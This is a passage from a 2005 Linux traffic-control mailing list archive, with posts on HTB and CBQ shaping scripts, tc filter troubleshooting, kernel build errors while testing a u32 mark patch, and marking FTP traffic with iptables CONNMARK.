<41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch> <41DD3CBC.1010108@dsl.pipex.com> <20050106164553.GV26856@postel.suug.ch> <41DDC858.6010908@dsl.pipex.com> <20050106232513.GX26856@postel.suug.ch> <41DDCB49.6020105@dsl.pipex.com> Message-ID: <41DDF7C8.4000109@dsl.pipex.com> Andy Furniss wrote: > Thomas Graf wrote: > >> * Andy Furniss <41DDC858.6010908@dsl.pipex.com> 2005-01-06 23:23 >> >>>> CONFIG_NET_CLS_ACT_POLICE? >>> >>> >>> I can't find it! neither can grep .config >> >> >> >> Sorry, it's called CONFIG_NET_ACT_POLICE >> > > OK - will be booting back into LFS to try soon. Still no luck - I got build errors with bk8 (same type as below in fbdev IIRC) so tried bk9 and got error below. I've seen that before with 2.95.3 (though it was mandrakes not LFS - had to move some vars up to top to get Ed Wildgooses dsl patch to compile IIRC) so I tried bk8 with gcc 3.3 and it built OK, but still no luck + my usb intelli mouse didn't work. I tried the prio change on a 2.4 but it makes no difference. I have CONFIG_NET_ACT_POLICE in all my configs and police auto loads OK on 2.6.9 (haven't checked others yet)- the 2.6.10-bk8 didn't autoload it though, but modprobe first didn't help. Probably lots more to try/check but it's getting late :-) Does my initial test case work OK for you guys ? http://marc.theaimsgroup.com/?l=lartc&m=110122532022827&w=2 The build error - CC net/sched/sch_generic.o CC net/sched/sch_api.o CC net/sched/sch_fifo.o CC net/sched/cls_api.o net/sched/cls_api.c: In function `tcf_exts_validate': net/sched/cls_api.c:467: parse error before `int' net/sched/cls_api.c:471: `act' undeclared (first use in this function) net/sched/cls_api.c:471: (Each undeclared identifier is reported only once net/sched/cls_api.c:471: for each function it appears in.) net/sched/cls_api.c:472: `err' undeclared (first use in this function) make[2]: *** [net/sched/cls_api.o] Error 1 make[1]: *** [net/sched] Error 2 make: *** [net] Error 2 Andy. From Zhenyu Wu" Hello, I think I have misundertood the relationship between cbq and the queue (such as Red) attached to it. This is my latest opion, please give me some advice on it: At beginning, I thought that a packet will be firstly classified by the CBQ where it will find the proper class it belongs to. Then the packet enters the queue attached to that class. At last, the packet is scheduled in that queue, and put into the link. But now, I find it is wrong. I have read the source code on CBQ again, especially the part-cbq_dequeue, I think that at first the CBQ will find the active class and their priority. Then in the function cbq_dequeue_prio, the algorithm WRR will be used to schedule the packet. At first, it find a class, then, this skb = cl->q->dequeue(cl->q) maybe very important, I think "cl->q" is the queue attached to the class "cl". So, the packet in the different queue is scheduled and put into the link. Another issue is that a scheduling algorithm WRR is used here, But i think it is not the best one, So can we modify here and add a new scheduling algorithm as we expected? What about your opions? Best, From andy.furniss@dsl.pipex.com Fri Jan 7 10:29:24 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Fri, 07 Jan 2005 10:29:24 +0000 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <41DDF7C8.4000109@dsl.pipex.com> References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch> <41DD3CBC.1010108@dsl.pipex.com> <20050106164553.GV26856@postel.suug.ch> <41DDC858.6010908@dsl.pipex.com> <20050106232513.GX26856@postel.suug.ch> <41DDCB49.6020105@dsl.pipex.com> <41DDF7C8.4000109@dsl.pipex.com> Message-ID: <41DE6484.9050100@dsl.pipex.com> Andy Furniss wrote: > my usb intelli mouse didn't > work. > the 2.6.10-bk8 didn't autoload it > though, Of course putting -bk8 on my /boot/System.map-2.6.10 will fix that ... Will try more tonight. Andy. From prakash@comodo.com Fri Jan 7 10:15:43 2005 From: prakash@comodo.com (Annamalai Prakash) Date: Fri, 7 Jan 2005 15:45:43 +0530 Subject: [LARTC] arm Linux 2.4.19-rmk7-ds3 with Traffic shaping and Routing. Message-ID: <200501071545.49002.prakash@comodo.com> =2D----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, =20 I am very newbie to this group. I am working on ixdp425 embedde= d=20 Board. I have brought up board with linux 2.4.19-rmk7-ds3 kernel with Qos=20 support. Now i want to do traffic control (tc) on my board. Is there any=20 patches available for this kernel and also application. I dont know which=20 version of iproute2 is compitable one with this. i m planning to use=20 iproute2-1.2.7a. Please guide me ... i m trying to implement this from last= =20 week... =2D --=20 Thanks & Regards K.Annamalai Prakash =2D----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.3 (GNU/Linux) iD8DBQFB3mFSk8m0kb/vZlYRAloYAKCaIxi8qt5nCcrnAKPsAl3sJbnHmgCeNew/ 77RRJgIp4szEsZ45jGykpo0=3D =3DEbwj =2D----END PGP SIGNATURE----- From andre.correa@pobox.cla Fri Jan 7 13:29:53 2005 From: andre.correa@pobox.cla (Andre Correa) Date: Fri, 07 Jan 2005 11:29:53 -0200 Subject: [LARTC] Filter question In-Reply-To: <41DD5120.9030209@pobox.com> References: <200410121632.38611.alg0@iit.demokritos.gr> <41DD5120.9030209@pobox.com> Message-ID: <41DE8ED1.2090409@pobox.com> Hi guys, I may not have made myself clear in my last message so I'll try it easy this time. Maybe someone can send me some help. I'm trying something like this: # root stuff tc qdisc add dev eth0 root handle 1: htb default 2 tc class add dev eth0 parent 1: classid 1:1 htb rate 50000kbit # default class tc class add dev eth0 parent 1: classid 1:2 htb rate 2000kbit # root class for my "garanteed bandwidth" service tc class add dev eth0 parent 1: classid 1:3 htb rate 10Mbit # class for a 1Mbit shared bandwidth tc class add dev eth0 parent 1:3 classid 1:1024 htb rate 1Mbit # qdisc used to _make my life easier scripting classes numbers_ tc qdisc add dev eth0 parent 1:1024 handle 1024: htb default 250 # default class for this second qdisc tc class add dev eth0 parent 1024: classid 1024:250 htb rate 32kbit # each customer gets the following class and filter tc class add dev eth0 parent 1024: classid 1024:1 htb rate 256kbit tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst xxx.xxx.xxx.xxx/yy flowid 1024:1 # another customer... tc class add dev eth0 parent 1024: classid 1024:2 htb rate 256kbit tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst www.www.www.www/zzz flowid 1024:2 My problem is that this filters are created but they don't send traffic to the expected class. All traffic is going to 1:2 (default class). Can somebody tell me why? I apreciate any help, I'm in trouble with this... tks in advance. Andre From junk@maild.mine.nu Fri Jan 7 14:40:45 2005 From: junk@maild.mine.nu (junk@maild.mine.nu) Date: Fri, 7 Jan 2005 16:40:45 +0200 (IST) Subject: [LARTC] How to balance OUTBOUND traffic by packet if.. Message-ID: <1383.192.168.1.2.1105108845@maild.mine.nu> how to use iproute/iptables to balance by packet OUTBOUND traffic between 2 PPP (pptp cable modem and pppoe adsl modem) links to the same ISP . also by using the fact that the ISP dosen't filter source IP address - meaning i can use either PPP's link assigned IP address as the source IP in the ip header.., it works for both devices.., what i want to achive is : when uploading a large file , i could use both devices to shoot data but bound only to one source IP. Naturally i could expect all data to go back through the device with that corresponding IP , atleast that is what happens according to ethereal From msuzen@kibris.net Fri Jan 7 16:29:27 2005 From: msuzen@kibris.net (Mehmet Ali Suzen) Date: Fri, 7 Jan 2005 18:29:27 +0200 (EET) Subject: [LARTC] tc and ntop inconsistent data flow In-Reply-To: <200501062028.16256.stef.coene@docum.org> References: <50784.212.175.247.7.1105025581.squirrel@webmail2.kibris.net> <200501062028.16256.stef.coene@docum.org> Message-ID: <42020.212.175.247.7.1105115367.squirrel@webmail2.kibris.net> Dear Stef Coene, Many thanks for the tip. Seems like it is working now. But I have restrict 2 way traffic with 42 Kbit, that is correspond to 64 Kbit. Is it logical? What is the proportion between dowload and upload in an ideal data flow? Best Regards, Mehmet. PS: Thanx for your effort in your web site. sharing info you have with the community. > On Thursday 06 January 2005 16:33, Mehmet Ali Suzen wrote: >> Dear List, >> Sorry for the dublicated email but I couldn't get any answer. >> >> I am trying to limit some IP blocs with tc with following three step. >> >> # interface >> tc qdisc add dev eth0 root handle 1: cbq avpkt 1000 bandwidth 256kbit # >> class tc class add dev eth0 parent 1: classid 1:1 cbq rate 64kbit \ >> allot 1500 prio 5 bounded isolated >> # rules >> # download >> tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \ >> match ip dst 10.0.1.0/24 flowid 1:1 >> # upload >> tc filter add dev eth0 parent 1: protocol ip prio 16 u32 \ >> match ip src 10.0.1.0/24 flowid 1:1 >> >> >> Problem is when I try to measure traffic with ntop (www.ntop.org), it is >> seen that overall traffic which that ip block limited to is >> much higher then 64kbit, actually it is about 500Kbps which >> signifies that tc do not limit properly. What could be the reason >> of this inconsistancy? How could I limit 64 Kbps? Is the above >> configuration correct? > Remove the isolated parameter and try it again. > I have some working cbq scripts on http://docum.org on the test pages. > > Stef > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From andy.furniss@dsl.pipex.com Fri Jan 7 19:50:31 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Fri, 07 Jan 2005 19:50:31 +0000 Subject: [LARTC] Filter question In-Reply-To: <41DE8ED1.2090409@pobox.com> References: <200410121632.38611.alg0@iit.demokritos.gr> <41DD5120.9030209@pobox.com> <41DE8ED1.2090409@pobox.com> Message-ID: <41DEE807.8060702@dsl.pipex.com> Andre Correa wrote: > > Hi guys, I may not have made myself clear in my last message so I'll try > it easy this time. Maybe someone can send me some help. > > I'm trying something like this: > > > # root stuff > tc qdisc add dev eth0 root handle 1: htb default 2 > tc class add dev eth0 parent 1: classid 1:1 htb rate 50000kbit > # default class > tc class add dev eth0 parent 1: classid 1:2 htb rate 2000kbit > > # root class for my "garanteed bandwidth" service > tc class add dev eth0 parent 1: classid 1:3 htb rate 10Mbit > > # class for a 1Mbit shared bandwidth > tc class add dev eth0 parent 1:3 classid 1:1024 htb rate 1Mbit > # qdisc used to _make my life easier scripting classes numbers_ > tc qdisc add dev eth0 parent 1:1024 handle 1024: htb default 250 > # default class for this second qdisc > tc class add dev eth0 parent 1024: classid 1024:250 htb rate 32kbit > > # each customer gets the following class and filter > tc class add dev eth0 parent 1024: classid 1024:1 htb rate 256kbit > tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst > xxx.xxx.xxx.xxx/yy flowid 1024:1 > > # another customer... > tc class add dev eth0 parent 1024: classid 1024:2 htb rate 256kbit > tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst > www.www.www.www/zzz flowid 1024:2 > > > My problem is that this filters are created but they don't send traffic > to the expected class. All traffic is going to 1:2 (default class). Can > somebody tell me why? > > I apreciate any help, I'm in trouble with this... > > tks in advance. > > Andre > _______________________________________________ > LARTC mailing list / LARTC@mailman.ds9a.nl > http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/ > From andy.furniss@dsl.pipex.com Fri Jan 7 19:59:13 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Fri, 07 Jan 2005 19:59:13 +0000 Subject: [LARTC] Filter question In-Reply-To: <41DE8ED1.2090409@pobox.com> References: <200410121632.38611.alg0@iit.demokritos.gr> <41DD5120.9030209@pobox.com> <41DE8ED1.2090409@pobox.com> Message-ID: <41DEEA11.2070802@dsl.pipex.com> Andre Correa wrote: > > Hi guys, I may not have made myself clear in my last message so I'll try > it easy this time. Maybe someone can send me some help. > > I'm trying something like this: > > > # root stuff > tc qdisc add dev eth0 root handle 1: htb default 2 > tc class add dev eth0 parent 1: classid 1:1 htb rate 50000kbit > # default class > tc class add dev eth0 parent 1: classid 1:2 htb rate 2000kbit > > # root class for my "garanteed bandwidth" service > tc class add dev eth0 parent 1: classid 1:3 htb rate 10Mbit > > # class for a 1Mbit shared bandwidth > tc class add dev eth0 parent 1:3 classid 1:1024 htb rate 1Mbit > # qdisc used to _make my life easier scripting classes numbers_ > tc qdisc add dev eth0 parent 1:1024 handle 1024: htb default 250 > # default class for this second qdisc > tc class add dev eth0 parent 1024: classid 1024:250 htb rate 32kbit > > # each customer gets the following class and filter > tc class add dev eth0 parent 1024: classid 1024:1 htb rate 256kbit > tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst > xxx.xxx.xxx.xxx/yy flowid 1024:1 > > # another customer... > tc class add dev eth0 parent 1024: classid 1024:2 htb rate 256kbit > tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst > www.www.www.www/zzz flowid 1024:2 > > > My problem is that this filters are created but they don't send traffic > to the expected class. All traffic is going to 1:2 (default class). Can > somebody tell me why? > > I apreciate any help, I'm in trouble with this... > > tks in advance. > > Andre You've created a double htb like in the simulation example on deviks' page. You need to filter from the top of the first htb to the second then filter from there. Below works for me Andy. # root stuff tc qdisc add dev eth0 root handle 1: htb default 2 tc class add dev eth0 parent 1: classid 1:1 htb rate 50000kbit # default class tc class add dev eth0 parent 1: classid 1:2 htb rate 2000kbit # root class for my "garanteed bandwidth" service tc class add dev eth0 parent 1: classid 1:3 htb rate 10Mbit # class for a 1Mbit shared bandwidth tc class add dev eth0 parent 1:3 classid 1:1024 htb rate 1Mbit # qdisc used to _make my life easier scripting classes numbers_ tc qdisc add dev eth0 parent 1:1024 handle 1024: htb default 250 # default class for this second qdisc tc class add dev eth0 parent 1024: classid 1024:250 htb rate 32kbit tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst 192.168.0.1 flowid 1:1024 tc filter add dev eth0 parent 1: protocol ip prio 1 u32 match ip dst 192.168.0.2 flowid 1:1024 # each customer gets the following class and filter tc class add dev eth0 parent 1024: classid 1024:1 htb rate 256kbit tc filter add dev eth0 parent 1024: protocol ip prio 1 u32 match ip dst 192.168.0.1 flowid 1024:1 # another customer... tc class add dev eth0 parent 1024: classid 1024:2 htb rate 256kbit tc filter add dev eth0 parent 1024: protocol ip prio 1 u32 match ip dst 192.168.0.2 flowid 1024:2 From andy.furniss@dsl.pipex.com Sat Jan 8 02:34:23 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Sat, 08 Jan 2005 02:34:23 +0000 Subject: [LARTC] [PATCH] mark in u32 In-Reply-To: <41DE6484.9050100@dsl.pipex.com> References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DC06D8.70301@dsl.pipex.com> <20050105155250.GA17836@postel.suug.ch> <41DC1880.6090405@dsl.pipex.com> <41DCFE27.4030704@dsl.pipex.com> <20050106095009.GU26856@postel.suug.ch> <41DD3CBC.1010108@dsl.pipex.com> <20050106164553.GV26856@postel.suug.ch> <41DDC858.6010908@dsl.pipex.com> <20050106232513.GX26856@postel.suug.ch> <41DDCB49.6020105@dsl.pipex.com> <41DDF7C8.4000109@dsl.pipex.com> <41DE6484.9050100@dsl.pipex.com> Message-ID: <41DF46AF.5070505@dsl.pipex.com> Andy Furniss wrote: > Andy Furniss wrote: > >> my usb intelli mouse didn't work. >> > the 2.6.10-bk8 didn't autoload it > >> though, > > > Of course putting -bk8 on my /boot/System.map-2.6.10 will fix that ... It didn't :-( but I tried more on 2.6.9 and found a u32 that works - tc filter add dev eth0 parent ffff: prio 1 protocol ip u32 match ip protocol 6 0xff police rate 100kbit burst 10k drop flowid :1 is OK so maybe it is just the fw case that fails. Andy. From gypsy@iswest.com Sat Jan 8 04:14:45 2005 From: gypsy@iswest.com (gypsy) Date: Fri, 07 Jan 2005 20:14:45 -0800 Subject: [LARTC] [PATCH] mark in u32 References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> Message-ID: <41DF5E35.7342470C@iswest.com> Thomas Graf wrote: > > Would you guys like to see esfq included in mainline? YES!! gypsy From gypsy@iswest.com Sat Jan 8 04:58:03 2005 From: gypsy@iswest.com (gypsy) Date: Fri, 07 Jan 2005 20:58:03 -0800 Subject: [LARTC] [PATCH] mark in u32 References: <41DC00E0.2070300@dsl.pipex.com> <20050105151026.GR26856@postel.suug.ch> <41DF5E35.7342470C@iswest.com> Message-ID: <41DF685B.2B595FB@iswest.com> gypsy wrote: > > Thomas Graf wrote: > > > > > Would you guys like to see esfq included in mainline? > > YES!! > > gypsy Thomas, Let me rephrase that. I can't think of any reason that SFQ should be maintained without the E . It makes very little sense to hard code parameters that the user might wish or need to supply. That's the reason for ESFQ. When no parameters are given, it _is_ SFQ; when there are parameters it complies with ones wishes. Name it what you like, but SFQ desperately needs to accept paramters, and ESFQ should be the only SFQ. gypsy From ngohoanggiang1981dh@yahoo.com Sat Jan 8 07:55:57 2005 From: ngohoanggiang1981dh@yahoo.com (ngo giang) Date: Fri, 7 Jan 2005 23:55:57 -0800 (PST) Subject: [LARTC] Marking ftp inbound traffic is impossible ? Message-ID: <20050108075557.73544.qmail@web51605.mail.yahoo.com> --0-1507306046-1105170957=:72543 Content-Type: text/plain; charset=us-ascii Hello, I searched the archives mailing list of LARTC. Everyone discussed about marking outbound ftp traffic . I could not find any thread discussed about marking inbound ftp traffic. With inbound ftp traffic , we don't know the random ports specified by ftp servers in passive mode ? So marking inbound ftp traffic is impossible ? If it is possible, can you tell me, Thanks in advance, nhgiang __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com --0-1507306046-1105170957=:72543 Content-Type: text/html; charset=us-ascii
Hello,
 
I searched the archives mailing list of LARTC. Everyone discussed about marking outbound ftp
 
traffic . I could not  find any thread discussed about marking inbound ftp traffic.
 
 With inbound ftp traffic , we don't know the random ports specified by ftp servers in passive mode ?
 
So marking inbound ftp traffic is impossible ?
 
If it is possible, can you tell me,
 
Thanks in advance,
 
nhgiang
 

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com --0-1507306046-1105170957=:72543-- From jayesh@bol.co.tz Sat Jan 8 09:25:36 2005 From: jayesh@bol.co.tz (jayesh) Date: Sat, 8 Jan 2005 12:25:36 +0300 Subject: [LARTC] htb script Message-ID: <001301c4f564$02d71000$fd00000a@jayesh> This is a multi-part message in MIME format. ------=_NextPart_000_000F_01C4F57D.281AD220 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0010_01C4F57D.281AD220" ------=_NextPart_001_0010_01C4F57D.281AD220 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable dear all=20 iam newbie , i have 256 kbits of down link and 64 kbits of up link iam = using squid and htb i have got this while browsing the net , there are = some few issues i need help=20 while running the script i want browsing to be as fast as possible , = uplink especially kaaza should not eat my band width.=20 eth1 got public ip address and eth0 is internal with network = 10.0.0.0/24 iam also using nat , how can i make squid incoporates with = htb (squid uses 3128) here is my script=20 please help with clarification=20 regards Dealing in Computers, Software and Peripherals=20 =20 Jayesh Chandran Compucat Technologies (An associate of Milan Cable Television) 1.Goliondoi Road, Arusha. 2.Ground Floor, Serengeti Wing, PB No. 10367, AICC, Arusha, Tanzania =20 jayesh@bol.co.tz tel:=20 fax:=20 mobile: +255 27 2502660 +255 27 2504527 +255 748 586169 =20 =20 =20 =20 =20 Add me to your address book... Want a signature like this?=20 =20 ------=_NextPart_001_0010_01C4F57D.281AD220 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable

dear all
iam  newbie , i have 256 kbits of = down link=20 and 64 kbits of up link iam using squid and htb i have got = this  while=20 browsing the net , there are some few issues i need help
while running the script i want  = browsing to=20 be as fast as possible , uplink especially kaaza should not eat my band = width.=20
eth1  got public ip address and = eth0 is=20 internal with network 10.0.0.0/24 iam also using nat , how can = i make=20 squid incoporates with htb (squid uses 3128)
here is my script
 
please help with clarification =
regards
Dealing in Computers, Software and=20 Peripherals
Jayesh Chandran Compucat Technologies
(An=20 associate of Milan Cable = Television)
1.Goliondoi=20 Road, Arusha.
2.Ground Floor, Serengeti = Wing,
PB=20 No. 10367, AICC, Arusha, Tanzania
jayesh@bol.co.tz
tel: =
fax:=20
mobile: 		+255 27 2502660
+255 27=20 2504527
+255 748 586169=20 =
Add me to your address = book... Want a signature like=20 = this?
------=_NextPart_001_0010_01C4F57D.281AD220-- ------=_NextPart_000_000F_01C4F57D.281AD220 Content-Type: text/plain; name="rc.txt" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="rc.txt" #!/bin/bash=0A= TC=3D/sbin/tc=20 IPTABLES=3D/sbin/iptables $TC qdisc del dev eth0 root 2> /dev/null > /dev/null $TC qdisc del dev eth1 root 2> /dev/null > /dev/null=0A= $TC qdisc del dev eth1 ingress 2> /dev/null > /dev/null $IPTABLES -F POSTROUTING -t mangle=0A= $TC qdisc add dev eth0 root handle 1: htb default 50 r2q 2 $TC class add dev eth0 parent 1: classid 1:2 htb rate 248Kbit burst 35k $TC class add dev eth0 parent 1:2 classid 1:10 htb rate 220Kbit ceil = 240Kbit burst 25k prio 0 $TC class add dev eth0 parent 1:2 classid 1:30 htb rate 28Kbit ceil = 28Kbit burst 10k prio 1=20 $TC class add dev eth0 parent 1: classid 1:60 htb rate 1Kbit ceil = 100Mbit prio 1 $TC qdisc add dev eth0 parent 1:10 handle 11: sfq perturb 10 $TC qdisc add dev eth0 parent 1:30 handle 33: sfq perturb 10 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -j MARK = --set-mark 3 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 80 -j MARK --set-mark 1 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 443 -j MARK --set-mark 1 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 22 -j MARK --set-mark 1 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 21 -j MARK --set-mark 1 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 53 -j MARK --set-mark 1 =0A= $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p udp = --sport 53 -j MARK --set-mark 1=20 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 110 -j MARK --set-mark 1 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 5190 -j MARK --set-mark 1 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 6661:6669 -j MARK --set-mark 1=20 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p tcp = --sport 3128 -j MARK --set-mark 1 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s ! 10.0.0.0/24 -p udp = --sport 3128 -j MARK --set-mark 1#$IPTABLES -t mangle -A POSTROUTING -o = eth0 -s ! 10.0.0.0/24 -p icmp -j MARK --set-mark 1=0A= =20 $TC filter add dev eth0 parent 1:0 protocol ip handle 1 fw flowid 1:10 $TC filter add dev eth0 parent 1:0 protocol ip handle 3 fw flowid 1:30=0A= $TC filter add dev eth0 parent 1:0 protocol ip prio 1 u32 \ match ip protocol 0x6 0xff \ match ip tos 0x10 0xff \ flowid 1:60 =20 ############################## $TC qdisc add dev eth1 root handle 1: htb default 20 $TC class add dev eth1 parent 1: classid 1:1 htb rate 62Kbit burst 35k $TC class add dev eth1 parent 1:1 classid 1:10 htb rate 40Kbit ceil = 60Kbit burst 25k prio 1 $TC class add dev eth1 parent 1:1 classid 1:20 htb rate 15Kbit ceil = 55Kbit burst 10k prio 2 $TC class add dev eth1 parent 1:1 classid 1:30 htb rate 7Kbit ceil = 28Kbit burst 5k prio 3 $TC qdisc add dev eth1 parent 1:10 handle 10: sfq perturb 10 $TC qdisc add dev eth1 parent 1:20 handle 20: sfq perturb 10 $TC qdisc add dev eth1 parent 1:30 handle 30: sfq perturb 10 $TC filter add dev eth1 parent 1:0 protocol ip prio 10 u32 \ match ip tos 0x10 0xff flowid 1:10 $TC filter add dev eth1 parent 1: protocol ip prio 10 u32 \ match ip protocol 6 0xff \ match u8 0x05 0x0f at 0 \ match u16 0x0000 0xffc0 at 2 \ match u8 0x10 0xff at 33 \ flowid 1:10=0A= =20 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -j MARK = --set-mark 12 # $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p icmp -j = MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp = --sport 22 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp = --sport 80 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp = --dport 80 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp = --dport 21 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp = --dport 20 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp = --sport 3128 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s ! 10.0.0.0/24 -p tcp = --dport 3128 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -j MARK = --set-mark 13 =20 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp --dport = 80 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 443 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 53 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p udp = --dport 53 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 22 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 23 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 21 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 25 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 110 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 5190 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth1 -s 10.0.0.0/24 -p tcp = --dport 6661:6669 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -p icmp -j MARK --set-mark 11=0A= $IPTABLES -t mangle -A POSTROUTING -o eth0 -s 10.0.0.0/24 -p udp --dport = 3128 -j MARK --set-mark 11 $IPTABLES -t mangle -A POSTROUTING -o eth0 -s 10.0.0.0/24 -p tcp --dport = 3128 -j MARK --set-mark 11 #$IPTABLES -t mangle -A POSTROUTING -p icmp -j RETURN $TC filter add dev eth1 parent 1:0 protocol ip handle 11 fw flowid 1:10 $TC filter add dev eth1 parent 1:0 protocol ip handle 12 fw flowid 1:20 $TC filter add dev eth1 parent 1:0 protocol ip handle 13 fw flowid 1:30 ------=_NextPart_000_000F_01C4F57D.281AD220-- From jnk@pwn.emphyrio.org Sat Jan 8 09:48:18 2005 From: jnk@pwn.emphyrio.org (Dimitris Kotsonis) Date: Sat, 08 Jan 2005 11:48:18 +0200 Subject: [LARTC] Marking ftp inbound traffic is impossible ? In-Reply-To: <20050108075557.73544.qmail@web51605.mail.yahoo.com> References: <20050108075557.73544.qmail@web51605.mail.yahoo.com> Message-ID: <41DFAC62.6090309@pwn.emphyrio.org> ngo giang wrote: > Hello, > > I searched the archives mailing list of LARTC. Everyone discussed about > marking outbound ftp > > traffic . I could not find any thread discussed about marking inbound > ftp traffic. > > With inbound ftp traffic , we don't know the random ports specified by > ftp servers in passive mode ? > > So marking inbound ftp traffic is impossible ? > > If it is possible, can you tell me, > > Thanks in advance, > > nhgiang Use CONNMARK and owner match. For example, to mark incoming and ougoing packets of vsftpd with fwmark 12 use the following ... iptables -t mangle -A OUTPUT -j CONNMARK --restore-mark iptables -t mangle -A OUTPUT -m owner --cmd-owner vsftpd -j MARK-set-mark 12 iptables -t mangle -A OUTPUT -j CONNMARK --save-mark From andy.furniss@dsl.pipex.com Sat Jan 8 11:57:14 2005 From: andy.furniss@dsl.pipex.com (Andy Furniss) Date: Sat, 08 Jan 2005 11:57:14 +0000 Subject: [LARTC] Marking ftp inbound traffic is impossible ? In-Reply-To: <20050108075557.73544.qmail@web51605.mail.yahoo.com> References: <20050108075557.73544.qmail@web51605.mail.yahoo.com> Message-ID: <41DFCA9A.5090605@dsl.pipex.com> ngo giang wrote: > Hello, > > I searched the archives mailing list of LARTC. Everyone discussed about marking outbound ftp > > traffic . I could not find any thread discussed about marking inbound ftp traffic. > > With inbound ftp traffic , we don't know the random ports specified by ftp servers in passive mode ? > > So marking inbound ftp traffic is impossible ? > > If it is possible, can you tell me, > > Thanks in advance, > > nhgiang There's an ftp protocol netfilter match - if you are conntracking maybe that will do it - never tested it myself. Andy. From stef.coene@docum.org Sat 